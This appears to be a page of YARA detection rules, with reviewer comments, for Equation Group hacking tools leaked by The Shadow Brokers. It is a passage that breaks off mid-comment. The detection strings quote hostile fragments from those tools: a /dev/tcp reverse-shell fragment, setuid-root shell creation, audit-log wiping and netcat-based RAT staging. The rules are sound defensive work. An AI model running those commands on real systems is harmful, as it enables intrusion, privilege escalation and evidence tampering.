YARA rules for The Shadow Brokers
YARA rules whose family, name, or description matches this actor or its tooling. Use these for binary-pattern hunts. Most of the rules below key on usage text, error messages and script fragments taken from the leaked files, so they will also fire on public exploit code that shares those strings, on analyst notes that quote them, and on the toolkit's own documentation; a hit is a lead for triage (compare against the listed hash1, check the file type the rule assumes), not by itself an attribution.
// Strings transcribed from the screenshots in the January 2017 ShadowBrokers
// "message7" post (Windows tooling such as DanderSpritz/PeddleCheap). They were
// read off images rather than extracted from samples, so each literal should be
// treated as unverified against a real binary until confirmed.
rule FVEY_ShadowBrokers_Jan17_Screen_Strings {
meta:
description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
date = "2017-01-08"
id = "59832d0a-0cb2-5eb9-a4e2-36aaa09a3998"
strings:
// $x*: framework/module names; any single one is accepted on its own.
// Both capitalisations are listed because the strings are case-sensitive
// (no 'nocase'); 'fullword' requires non-alphanumeric characters on both sides.
$x1 = "Danderspritz" ascii wide fullword
$x2 = "DanderSpritz" ascii wide fullword
$x3 = "PeddleCheap" ascii wide fullword
// NOTE(review): "Addres" is one letter short of "Address". Because of 'fullword',
// a file containing "ChimneyPool Address" will NOT match this string (the trailing
// 's' is alphanumeric). Confirm the exact literal against a sample before relying
// on $x4; if the real text is "Address", drop 'fullword' or fix the literal.
$x4 = "ChimneyPool Addres" ascii wide fullword
// $a*: individually generic console output; only counted when both are present.
$a1 = "Getting remote time" fullword ascii
$a2 = "RETRIEVED" fullword ascii
// $b*: DanderSpritz console lines; either one is accepted alone.
$b1 = "Added Ops library to Python search path" fullword ascii
$b2 = "target: z0.0.0.1" fullword ascii
// $c*: module names. "PasswordDump"/"EventLogEdit" are plausible in unrelated
// tooling, so one alone only counts inside a PE; otherwise three are required.
$c1 = "Psp_Avoidance" fullword ascii
$c2 = "PasswordDump" fullword ascii
$c4 = "EventLogEdit" fullword ascii
// $d*: Mcl_* wrapper names; three required and PE only.
$d1 = "Mcl_NtElevation" fullword ascii wide
$d2 = "Mcl_NtNativeApi" fullword ascii wide
$d3 = "Mcl_ThreatInject" fullword ascii wide
$d4 = "Mcl_NtMemory" fullword ascii wide
condition:
// 2000KB cap bounds scan cost; uint16(0) == 0x5a4d is the little-endian "MZ"
// header, i.e. the branch applies to PE files only.
filesize < 2000KB and (
1 of ($x*) or
all of ($a*) or
1 of ($b*) or
( uint16(0) == 0x5a4d and 1 of ($c*) ) or
3 of ($c*) or
( uint16(0) == 0x5a4d and 3 of ($d*) )
)
}
// emptycriss: helper that prints a payload to paste into a Solaris telnet login
// prompt. There is no file-type gate, so any text (notes, write-ups, other
// exploit code) that quotes these lines also matches; the TTYPROMPT trick in $s8
// is a well-known public technique, so a hit on $s8 alone is not attributable
// to this toolkit. Compare against hash1 before attributing.
rule EquationGroup_emptycriss {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
id = "658a0a2c-ea3a-5531-abea-54f0ed786e79"
strings:
// Usage line naming the tool itself; the most specific of the three.
$s1 = "./emptycriss <target IP>" fullword ascii
$s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
// Telnet environment-option payload; also present in unrelated public exploits.
$s8 = "environ define TTYPROMPT abcdef" fullword ascii
condition:
// Any one string in a file under 50KB; no magic check.
( filesize < 50KB and 1 of them )
}
// scripme: Perl session-recording wrapper (runs tcpdump on $INTERFACE and
// scripts the session). No shebang/magic check, so the rule also matches the
// script when embedded or copied into another file.
rule EquationGroup_scripme {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
id = "a2c5cd8b-c104-57d9-9ce2-a0b9a8dd9288"
strings:
// YARA escaping: \\\" is a literal backslash + quote and \\$ a literal backslash
// + dollar, i.e. this matches the Perl source text verbatim, not its output.
$x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
// $opetc / scripme.override are operator-environment paths specific to this tool.
$x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
$x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
$x4 = "$opetc/scripme.override" ascii
condition:
( filesize < 30KB and 1 of them )
}
// cryptTool: small ELF utility. $s1 suggests the tool prints its key to the
// console; if a hit is found on a host, captured terminal output or shell
// history may contain the key that was used (confirm against hash1).
rule EquationGroup_cryptTool {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
id = "e1f4e010-9c42-5b8a-8feb-2885b99307fe"
strings:
// Trailing space is part of the literal; 'fullword' has no effect on that side.
$s1 = "The encryption key is " fullword ascii
$s2 = "___tempFile2.out" ascii
condition:
// uint16(0) == 0x457f is the little-endian "\x7fEL" start of an ELF header.
// Both strings are required, which keeps the generic $s1 from matching alone.
( uint16(0) == 0x457f and filesize < 200KB and all of them )
}
// dumppoppy: Perl FTP-retrieval helper (RETR handling, -c clobber option).
// No type gate; text that quotes the usage or warning lines also matches.
rule EquationGroup_dumppoppy {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
id = "c316aac3-bdd7-5187-8ae2-0a87c2f2d26f"
strings:
$x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
// $x2 is the message as it appears in Perl source (escaped quotes).
$x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
// $l1 is the same message without the Perl escaping, as a fallback for copies
// that quote it differently. No modifier given, so YARA's default 'ascii' applies.
$l1 = "End of $destfile determined by \"^Connection closed by foreign host"
condition:
( filesize < 20KB and 1 of them )
}
// Auditcleaner: generates shell "pastables" that rewrite /var/log/audit/audit.log
// on the target, i.e. Linux auditd log tampering. A confirmed hit is anti-forensics:
// treat local audit logs on the affected host as untrustworthy and rely on
// remotely forwarded copies. No type gate, so notes quoting the one-liners match too.
rule EquationGroup_Auditcleaner {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
id = "39ed798a-221d-5a4b-8809-db01d5241418"
strings:
// Shell fragments that truncate/replace the audit log.
$x1 = "> /var/log/audit/audit.log; rm -f ." ascii
$x2 = "Pastables to run on target:" ascii
$x3 = "cp /var/log/audit/audit.log .tmp" ascii
// Status lines printed by the tool while selecting which records to keep.
$l1 = "Here is the first good cron session from" fullword ascii
$l2 = "No need to clean LOGIN lines." fullword ascii
condition:
( filesize < 300KB and 1 of them )
}
// reverse.shell.script: a bash /dev/tcp reverse-shell one-liner. The two
// fragments are the generic idiom, not anything actor-specific, so this rule is
// effectively a generic "tiny reverse shell script" detector: a hit is worth
// investigating but does not by itself attribute to this toolkit.
rule EquationGroup_reverse_shell {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826"
id = "0e9b8ff2-2187-5b61-a086-2ad4ff1a3b10"
strings:
// Shell redirected into a bash /dev/tcp/<host>/<port> pseudo-device.
$s1 = "sh >/dev/tcp/" ascii
// stdin/stderr wired to the same socket; leading space is part of the literal.
$s2 = " <&1 2>&1" fullword ascii
condition:
// Both fragments and a very small file; bounds the generic strings to one-liners.
( filesize < 1KB and all of them )
}
// tnmunger: tiny ELF port "munging" utility. Note $s1 contains $s2, and the
// character before the $s2 text in $s1 is a space, so whenever $s1 matches $s2
// matches as well; with '1 of them' the condition is effectively driven by $s2.
// Harmless redundancy, kept as published.
rule EquationGroup_tnmunger {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2"
id = "c95dd24f-ffc9-5e58-aed7-205daa001b8c"
strings:
$s1 = "TEST: mungedport=%6d pp=%d unmunged=%6d" fullword ascii
$s2 = "mungedport=%6d pp=%d unmunged=%6d" fullword ascii
condition:
// ELF header (0x457f little-endian) and a 10KB cap.
( uint16(0) == 0x457f and filesize < 10KB and 1 of them )
}
// ys.ratload.sh: shell loader script. uint16(0) == 0x2123 is the little-endian
// "#!" shebang, so only scripts are considered. Overlaps with EquationGroup_wrap_telnet
// ($x2 here equals that rule's $s2), so both rules may fire on either script.
// On a hit, the -l/-p/-x values and CALLBACK_PORT in the file are the pivot IOCs.
rule EquationGroup_ys_ratload {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75"
id = "abd120e7-23f8-530e-b21e-c50a2b571332"
strings:
// Usage/example text printed by the script.
$x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii
$x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
// Hard-coded default; a re-tooled copy with another port still hits via $x1/$x2.
$x3 = "CALLBACK_PORT=32177" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 3KB and 1 of them )
}
// eh.1.1.0.0: ELF exploit/client with TLS options (-c cert, -k key). $x2 looks
// like an HTTP form body the tool sends (TYPE=licxfer&ftp=...), which could also
// back a network signature; confirm against hash1 before deploying one.
rule EquationGroup_eh_1_1_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628"
id = "a6f0ec1f-b0e5-5913-970d-9cdadf647c44"
strings:
$x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii
// No 'fullword' because the literal ends mid-parameter (licfile= is followed by a value).
$x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii
// "-m save MAC time file(s)" indicates timestamp-preservation, an anti-forensic option.
$x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 100KB and 1 of them )
}
// evolvingstrategy.1.0.1.1: small privilege-escalation wrapper script. $s1/$s2
// are the textbook "copy /bin/sh, chown root, chmod 4777" setuid-shell idiom and
// appear in many tutorials; with no type gate and '1 of them', text files that
// quote them will match. $x1 (the ey_vrupdate path) is the distinctive indicator.
rule EquationGroup_evolvingstrategy_1_0_1 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b"
id = "465f709b-1791-5b36-836b-7a0c08bb9b88"
strings:
// Generic setuid-root shell creation.
$s1 = "chown root sh; chmod 4777 sh;" fullword ascii
$s2 = "cp /bin/sh .;chown root sh;" fullword ascii
$l1 = "echo clean up when elevated:" fullword ascii
// Tool-specific path.
$x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii
condition:
( filesize < 4KB and 1 of them )
}
// toast_v3.2.0.1-linux: ELF log cleaner. The usage line (-w wtmp -r user)
// indicates it edits login records, so on a confirmed host treat wtmp/utmp
// as tampered and corroborate logins from other sources (auth logs, network).
rule EquationGroup_toast_v3_2_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b"
id = "776014ae-be94-5d81-bceb-fefb67ee1994"
strings:
$x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii
// "Roasting" status output; $s5 is not 'fullword' because it continues with format args.
$s5 = "Roasting ->%s<- at ->%d:%d<-" ascii
$s6 = "rbnoil -Roasting ->" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and 1 of them )
}
// sshobo: modified SSH client. NOTE(review): all four literals appear to be
// stock OpenSSH client diagnostics (port-forwarding, channel and packet messages),
// not text unique to sshobo, so the strings identify "an OpenSSH-derived client
// build" and the rule's specificity rests on 'all of them' plus the 600KB cap,
// which excludes typical distribution ssh binaries by size only. Expect hits on
// small/static or older ssh builds; confirm against hash1 before attributing.
rule EquationGroup_sshobo {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45"
id = "b9392aec-34a8-5ad2-b3fd-eea907d19701"
strings:
$x1 = "Requested forwarding of port %d but user is not root." fullword ascii
$x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii
$x3 = "~# - list forwarded connections" fullword ascii
$x4 = "packet_inject_ignore: block" fullword ascii
condition:
// ELF, under 600KB, and every string present.
( uint16(0) == 0x457f and filesize < 600KB and all of them )
}
// magicjack client: Python script (shebang required via uint16(0) == 0x2123 == "#!")
// that sends shell commands to a remote component. The self.options.* fragments
// make either string reasonably specific on its own.
rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1"
id = "008cb5cf-1d2d-5312-9474-2f93db190974"
strings:
$x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii
$x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 80KB and 1 of them )
}
// packrat: Perl helper that stages a RAT for download via a netcat listener
// ($x5). A hit suggests implant staging; the $port / bind address in the file
// and any matching listener on the operator side are follow-up leads.
// No type gate: documentation quoting these lines also matches.
rule EquationGroup_packrat {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file packrat"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf"
id = "4c0619c4-728f-591f-aa02-7c28f1f42fd1"
strings:
$x2 = "Use this on target to get your RAT:" fullword ascii
// Trailing space is part of the literal; 'fullword' only constrains the left side here.
$x3 = "$ratremotename && " fullword ascii
$x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii
condition:
( filesize < 70KB and 1 of them )
}
// telex: ELF remote exploit (default target port 23 per the usage line, so
// presumably a telnet service). $s3/$s4 are fairly generic exploit status
// messages; they are acceptable here only because of the ELF + 50KB gate.
rule EquationGroup_telex {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file telex"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef"
id = "23571734-869d-5d68-9339-d82f168c2e47"
strings:
$x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>" fullword ascii
$x2 = "target is not vulnerable. exiting" fullword ascii
$s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii
$s4 = "Timeout waiting for daemon to die. Exploit probably failed." fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and 1 of them )
}
// calserver: ELF exploit client with exploit/read/move/write modes ($x3) that
// uploads and executes a local file on the target ($x1). Strings are the tool's
// own usage text; any one of them in a small ELF is accepted.
rule EquationGroup_calserver {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file calserver"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099"
id = "abe935ee-8579-54f0-b6d3-172d6e2c0482"
strings:
$x1 = "usage: %s <host> <port> e <contents of a local file to be executed on target>" fullword ascii
$x2 = "Writing your %s to target." fullword ascii
$x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 1 of them )
}
// porkclient: ELF client. $s3 references a "Nopen connection" (the toolkit's
// NOPEN implant), making it the most attributable string; $s1 is a generic
// option description and is tolerable only because of the ELF + 30KB gate.
rule EquationGroup_porkclient {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748"
id = "5b34d5f9-bc76-5cc7-92f7-32c2b7ef7bcf"
strings:
$s1 = "-c COMMAND: shell command string" fullword ascii
$s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii
$s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 1 of them )
}
// electricslide: large ELF exploit/listener tool ("eslide"). The misspellings
// in $x1 ("altername") and $x2 ("Recieved") presumably reproduce the binary's
// own text; do NOT spell-correct them, or the strings stop matching the sample.
rule EquationGroup_electricslide {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014"
id = "5b1e5293-806a-58e6-b865-66025c8d8c32"
strings:
$x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii
$x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii
$x3 = "Usage: eslide [options] <-t profile> <-l listenerip> <targetip>" fullword ascii
$x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii
condition:
// 2000KB cap is wider than most rules in this set; the sample is a large binary.
( uint16(0) == 0x457f and filesize < 2000KB and 1 of them )
}
// libXmexploit2.8: small ELF local exploit. $s2 ("sizeof shellcode = %d") and
// $s3 ("Execve failed!") are common in exploit proof-of-concepts generally, so a
// hit on either alone in a small ELF deserves triage; $s1's usage line is the
// distinctive one.
rule EquationGroup_libXmexploit2 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796"
id = "30e94123-acc9-5185-9f5b-1f956c4cf3d1"
strings:
$s1 = "Usage: ./exp command display_to_return_to" fullword ascii
$s2 = "sizeof shellcode = %d" fullword ascii
$s3 = "Execve failed!" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 40KB and 1 of them )
}
// wrap-telnet.sh: shell wrapper script (shebang required, 0x2123 == "#!").
// $s2 is identical to EquationGroup_ys_ratload's $x2, so the two rules overlap
// by design; a file that hits one may hit both. The callback port values in a
// matched file (SPORT and the -p/-s arguments) are pivot IOCs.
rule EquationGroup_wrap_telnet {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4"
id = "158e6ebc-6b43-5e94-9052-31408d848875"
strings:
$s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii
$s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii
$s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 4KB and 1 of them )
}
// elgingamble: Linux kernel privilege-escalation tool. NOTE(review): this is the
// only rule in the set with neither a filesize cap nor a magic check, so every
// scanned file is searched in full, and $x2/$x3 ("[-] kernel not vulnerable",
// "[-] failed to spawn shell: %s") are phrasing shared by many public Linux LPE
// proof-of-concepts (they also overlap epoxyresin/envoytomato below). $x1, the
// cron line that creates a setuid-root binary, is the distinctive string. If hit
// volume is a problem, consider gating on ELF/filesize like the sibling rules —
// a behaviour change, so validate against hash1 first.
rule EquationGroup_elgingamble {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd"
id = "fc8a63a1-9deb-5051-a02d-ed26fd1cae95"
strings:
// crontab entry template: chown root + chmod 4755 on the payload, then run it.
$x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii
$x2 = "[-] kernel not vulnerable" fullword ascii
$x3 = "[-] failed to spawn shell: %s" fullword ascii
$x4 = "-s shell Use shell instead of %s" fullword ascii
condition:
1 of them
}
// cmsd: ELF remote exploit (rpc.cmsd-style usage with protocol versions 5|6|7).
// The second branch ('2 of them', no type gate) can be satisfied by $s1 + $s2,
// both of which are generic ("port=%d connected!" and the mkstemp-style
// "xxx.XXXXXX" template), so hits without an $x string need triage.
rule EquationGroup_cmsd {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8"
id = "9cdd3562-fed4-5b79-b056-049279404eeb"
strings:
$x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii
$x2 = "error: not vulnerable" fullword ascii
$s1 = "port=%d connected! " fullword ascii
$s2 = "xxx.XXXXXX" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 1 of ($x*) ) or ( 2 of them )
}
// ebbshave.v5: wrapper around the ebbnew_linux exploit for Sparc Solaris RPC
// services ($s4). The 192.168.10.4:32772 in $s2 is example text from the usage
// message, not a network IOC. Second branch ('2 of them') has no type gate, so
// documentation quoting two of these lines also matches.
rule EquationGroup_ebbshave {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b"
id = "6d4c14e2-afb1-57ce-91df-cb024258250e"
strings:
$s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii
$s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii
$s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii
$s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them )
}
// eggbasket: ELF web-server exploit with a brute-force ("EXHAUSTIVE ATTACK")
// mode. The addresses in $x2 (555.1.2.2, 10.0.0.1) are example text, not IOCs.
// Second branch ('2 of them') applies to any file type.
rule EquationGroup_eggbasket {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f"
id = "3fb1388a-e6b8-5c7a-ad23-ddbfc9d33d56"
strings:
$x1 = "# Building Shellcode into exploit." fullword ascii
$x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80" fullword ascii
// Trailing space is part of the literal (followed by the target in the output).
$x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}
// jparsescan: Perl RPC-scan parser. $s1 differs from EquationGroup_parsescan's
// usage line only in "-f directory" vs "-f file", so the two rules do not
// overlap on that string; $s2 (a rpcinfo-style regex) is the specific one.
rule EquationGroup_jparsescan {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984"
id = "6b6a884e-0bbc-54f5-bb6c-00e15ca95250"
strings:
$s1 = "Usage: $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
$s2 = "$gotsunos = ($line =~ /program version netid address service owner/ );" fullword ascii
condition:
( filesize < 40KB and 1 of them )
}
// sambal: Samba remote exploit. NOTE(review): the status/usage lines here appear
// to be those of the publicly circulated 2003 "sambal" Samba exploit, so a hit
